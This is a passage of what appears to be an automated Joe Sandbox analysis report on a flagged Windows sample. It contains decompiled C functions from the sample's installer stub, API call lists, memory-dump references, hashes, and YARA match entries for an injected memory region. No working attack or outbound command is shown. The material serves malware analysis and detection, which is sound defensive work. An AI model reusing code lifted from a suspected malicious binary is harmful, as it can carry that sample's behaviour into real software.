                                                                                      					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                      					return _t8;
                                                                                      				}
                                                                                      				_t9 = 6;
                                                                                      				return _t9;
                                                                                      			}







                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004044E5(int _a4) {
                                                                                      				struct HWND__* _t2;
                                                                                      				long _t3;
                                                                                      
                                                                                      				_t2 =  *0x433ed8;
                                                                                      				if(_t2 != 0) {
                                                                                      					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                                      					return _t3;
                                                                                      				}
                                                                                      				return _t2;
                                                                                      			}






                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004044CE(int _a4) {
                                                                                      				long _t2;
                                                                                      
                                                                                      				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                                                      				return _t2;
                                                                                      			}





                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004034E5(long _a4) {
                                                                                      				long _t2;
                                                                                      
                                                                                      				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                      				return _t2;
                                                                                      			}





                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004044BB(int _a4) {
                                                                                      				int _t2;
                                                                                      
                                                                                      				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                                                      				return _t2;
                                                                                      			}





                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004014D7(intOrPtr __edx) {
                                                                                      				long _t3;
                                                                                      				void* _t7;
                                                                                      				intOrPtr _t10;
                                                                                      				void* _t13;
                                                                                      
                                                                                      				_t10 = __edx;
                                                                                      				_t3 = E00402D84(_t7);
                                                                                      				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                                                      				if(_t3 <= 1) {
                                                                                      					_t3 = 1;
                                                                                      				}
                                                                                      				Sleep(_t3); // executed
                                                                                      				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
                                                                                      				return 0;
                                                                                      			}








                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E710312BB() {
                                                                                      				void* _t3;
                                                                                      
                                                                                      				_t3 = GlobalAlloc(0x40,  *0x7103506c +  *0x7103506c); // executed
                                                                                      				return _t3;
                                                                                      			}





                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,710312DB,?,7103137F,00000019,710311CA,-000000A0), ref: 710312C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				long _v16;
                                                                                      				long _v20;
                                                                                      				long _v24;
                                                                                      				char _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				long _v36;
                                                                                      				char _v40;
                                                                                      				unsigned int _v44;
                                                                                      				signed int _v48;
                                                                                      				WCHAR* _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				intOrPtr _v64;
                                                                                      				intOrPtr _v68;
                                                                                      				WCHAR* _v72;
                                                                                      				void _v76;
                                                                                      				struct HWND__* _v80;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr _t82;
                                                                                      				long _t87;
                                                                                      				short* _t89;
                                                                                      				void* _t95;
                                                                                      				signed int _t96;
                                                                                      				int _t109;
                                                                                      				signed short _t114;
                                                                                      				signed int _t118;
                                                                                      				struct HWND__** _t122;
                                                                                      				intOrPtr* _t138;
                                                                                      				WCHAR* _t146;
                                                                                      				unsigned int _t150;
                                                                                      				signed int _t152;
                                                                                      				unsigned int _t156;
                                                                                      				signed int _t158;
                                                                                      				signed int* _t159;
                                                                                      				signed int* _t160;
                                                                                      				struct HWND__* _t166;
                                                                                      				struct HWND__* _t167;
                                                                                      				int _t169;
                                                                                      				unsigned int _t197;
                                                                                      
                                                                                      				_t156 = __edx;
                                                                                      				_t82 =  *0x42c240; // 0x7d1fcc
                                                                                      				_v32 = _t82;
                                                                                      				_t2 = _t82 + 0x3c; // 0x0
                                                                                      				_t3 = _t82 + 0x38; // 0x0
                                                                                      				_t146 = ( *_t2 << 0xb) + L"ppingA";
                                                                                      				_v12 =  *_t3;
                                                                                      				if(_a8 == 0x40b) {
                                                                                      					E00405B81(0x3fb, _t146);
                                                                                      					E004067C4(_t146);
                                                                                      				}
                                                                                      				_t167 = _a4;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					L8:
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L20:
                                                                                      						if(_a8 == 0x40f) {
                                                                                      							L22:
                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                      							_v12 = _v12 & 0x00000000;
                                                                                      							E00405B81(0x3fb, _t146);
                                                                                      							if(E00405F14(_t186, _t146) == 0) {
                                                                                      								_v8 = 1;
                                                                                      							}
                                                                                      							E0040653D(0x42b238, _t146);
                                                                                      							_t87 = E0040690A(1);
                                                                                      							_v16 = _t87;
                                                                                      							if(_t87 == 0) {
                                                                                      								L30:
                                                                                      								E0040653D(0x42b238, _t146);
                                                                                      								_t89 = E00405EB7(0x42b238);
                                                                                      								_t158 = 0;
                                                                                      								if(_t89 != 0) {
                                                                                      									 *_t89 = 0;
                                                                                      								}
                                                                                      								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                      									goto L35;
                                                                                      								} else {
                                                                                      									_t169 = 0x400;
                                                                                      									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                      									asm("cdq");
                                                                                      									_v48 = _t109;
                                                                                      									_v44 = _t156;
                                                                                      									_v12 = 1;
                                                                                      									goto L36;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t159 = 0;
                                                                                      								if(0 == 0x42b238) {
                                                                                      									goto L30;
                                                                                      								} else {
                                                                                      									goto L26;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									L26:
                                                                                      									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                                                      									if(_t114 != 0) {
                                                                                      										break;
                                                                                      									}
                                                                                      									if(_t159 != 0) {
                                                                                      										 *_t159 =  *_t159 & _t114;
                                                                                      									}
                                                                                      									_t160 = E00405E58(0x42b238);
                                                                                      									 *_t160 =  *_t160 & 0x00000000;
                                                                                      									_t159 = _t160;
                                                                                      									 *_t159 = 0x5c;
                                                                                      									if(_t159 != 0x42b238) {
                                                                                      										continue;
                                                                                      									} else {
                                                                                      										goto L30;
                                                                                      									}
                                                                                      								}
                                                                                      								_t150 = _v44;
                                                                                      								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                      								_v44 = _t150 >> 0xa;
                                                                                      								_v12 = 1;
                                                                                      								_t158 = 0;
                                                                                      								__eflags = 0;
                                                                                      								L35:
                                                                                      								_t169 = 0x400;
                                                                                      								L36:
                                                                                      								_t95 = E00404E27(5);
                                                                                      								if(_v12 != _t158) {
                                                                                      									_t197 = _v44;
                                                                                      									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                      										_v8 = 2;
                                                                                      									}
                                                                                      								}
                                                                                      								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                                                                                      									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                                                      									if(_v12 == _t158) {
                                                                                      										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                                                      									} else {
                                                                                      										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                                                      									}
                                                                                      								}
                                                                                      								_t96 = _v8;
                                                                                      								 *0x434fa4 = _t96;
                                                                                      								if(_t96 == _t158) {
                                                                                      									_v8 = E0040140B(7);
                                                                                      								}
                                                                                      								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                      									_v8 = _t158;
                                                                                      								}
                                                                                      								E004044BB(0 | _v8 == _t158);
                                                                                      								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                                                      									E004048E3();
                                                                                      								}
                                                                                      								 *0x42d258 = _t158;
                                                                                      								goto L53;
                                                                                      							}
                                                                                      						}
                                                                                      						_t186 = _a8 - 0x405;
                                                                                      						if(_a8 != 0x405) {
                                                                                      							goto L53;
                                                                                      						}
                                                                                      						goto L22;
                                                                                      					}
                                                                                      					_t118 = _a12 & 0x0000ffff;
                                                                                      					if(_t118 != 0x3fb) {
                                                                                      						L12:
                                                                                      						if(_t118 == 0x3e9) {
                                                                                      							_t152 = 7;
                                                                                      							memset( &_v76, 0, _t152 << 2);
                                                                                      							_v80 = _t167;
                                                                                      							_v72 = 0x42d268;
                                                                                      							_v60 = E00404CE0;
                                                                                      							_v56 = _t146;
                                                                                      							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                                                      							_t122 =  &_v80;
                                                                                      							_v64 = 0x41;
                                                                                      							__imp__SHBrowseForFolderW(_t122);
                                                                                      							if(_t122 == 0) {
                                                                                      								_a8 = 0x40f;
                                                                                      							} else {
                                                                                      								__imp__CoTaskMemFree(_t122);
                                                                                      								E00405E0C(_t146);
                                                                                      								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                                                      								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
                                                                                      									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                                                      									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                                                      										lstrcatW(_t146, 0x432ea0);
                                                                                      									}
                                                                                      								}
                                                                                      								 *0x42d258 =  *0x42d258 + 1;
                                                                                      								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                      							}
                                                                                      						}
                                                                                      						goto L20;
                                                                                      					}
                                                                                      					if(_a12 >> 0x10 != 0x300) {
                                                                                      						goto L53;
                                                                                      					}
                                                                                      					_a8 = 0x40f;
                                                                                      					goto L12;
                                                                                      				} else {
                                                                                      					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                      					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                                                      						E00405E0C(_t146);
                                                                                      					}
                                                                                      					 *0x433ed8 = _t167;
                                                                                      					SetWindowTextW(_t166, _t146);
                                                                                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                      					_push(1);
                                                                                      					E00404499(_t167);
                                                                                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                      					_push(0x14);
                                                                                      					E00404499(_t167);
                                                                                      					E004044CE(_t166);
                                                                                      					_t138 = E0040690A(8);
                                                                                      					if(_t138 == 0) {
                                                                                      						L53:
                                                                                      						return E00404500(_a8, _a12, _a16);
                                                                                      					} else {
                                                                                      						 *_t138(_t166, 1);
                                                                                      						goto L8;
                                                                                      					}
                                                                                      				}
                                                                                      			}

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                      • SetWindowTextW.USER32(00000000,-00436000), ref: 00404A03
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                      • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,-00436000), ref: 00404AF1
                                                                                      • lstrcatW.KERNEL32(-00436000,Call), ref: 00404AFD
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,-00436000), ref: 00404B0F
                                                                                        • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                        • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                        • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                        • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                        • Part of subcall function 004067C4: CharPrevW.USER32(?,?,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,-00436000,00000001,0042B238,-00436000,-00436000,000003FB,-00436000), ref: 00404BD2
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                        • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                                                        • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                        • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: A$C:\Users\user\AppData\Local\Temp$Call$ppingA
                                                                                      • API String ID: 2624150263-3801998483
                                                                                      • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                      • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                      • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                      • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 67%
                                                                                      			E004021AA(void* __eflags) {
                                                                                      				signed int _t52;
                                                                                      				void* _t56;
                                                                                      				intOrPtr* _t60;
                                                                                      				intOrPtr _t61;
                                                                                      				intOrPtr* _t62;
                                                                                      				intOrPtr* _t64;
                                                                                      				intOrPtr* _t66;
                                                                                      				intOrPtr* _t68;
                                                                                      				intOrPtr* _t70;
                                                                                      				intOrPtr* _t72;
                                                                                      				intOrPtr* _t74;
                                                                                      				intOrPtr* _t76;
                                                                                      				intOrPtr* _t78;
                                                                                      				intOrPtr* _t80;
                                                                                      				void* _t83;
                                                                                      				intOrPtr* _t91;
                                                                                      				signed int _t101;
                                                                                      				signed int _t105;
                                                                                      				void* _t107;
                                                                                      
                                                                                      				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                                      				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                                      				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                                      				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                                      				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                                      				_t52 =  *(_t107 - 0x20);
                                                                                      				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                      				_t101 = _t52 & 0x00008000;
                                                                                      				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                      				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                      				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                      					E00402DA6(0x21);
                                                                                      				}
                                                                                      				_t56 = _t107 + 8;
                                                                                      				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                                                                      				if(_t56 < _t83) {
                                                                                      					L14:
                                                                                      					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                      					_push(0xfffffff0);
                                                                                      				} else {
                                                                                      					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                      					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                                                      					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                      					if(_t61 >= _t83) {
                                                                                      						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                      						if(_t101 == _t83) {
                                                                                      							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
                                                                                      						}
                                                                                      						if(_t105 != _t83) {
                                                                                      							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                      						}
                                                                                      						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                      						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                      						if( *_t91 != _t83) {
                                                                                      							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                      						}
                                                                                      						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                      						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                      						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                      							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                      							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                      						}
                                                                                      						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                      						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                      					}
                                                                                      					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                      					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                      					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                      						_push(0xfffffff4);
                                                                                      					} else {
                                                                                      						goto L14;
                                                                                      					}
                                                                                      				}
                                                                                      				E00401423();
                                                                                      				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                                                      				return 0;
                                                                                      			}























                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID:
                                                                                      • API String ID: 542301482-0
                                                                                      • Opcode ID: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                                                      • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                      • Opcode Fuzzy Hash: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                                                      • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      • Opcode ID: 29d28a66994e65b41c47eb62928cd883787cb7efa676d320450b0f8a96831bd0
                                                                                      • Instruction ID: 1fadaa25fa5695ea0e7ee358ecb6f33b43ae567800327d11aee02c99d523a87f
                                                                                      • Opcode Fuzzy Hash: 29d28a66994e65b41c47eb62928cd883787cb7efa676d320450b0f8a96831bd0
                                                                                      • Instruction Fuzzy Hash: FCB16A72648345CFDB348F28C8A47EA3BB1EF953A0F59412ECD8ACB655D7718982CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
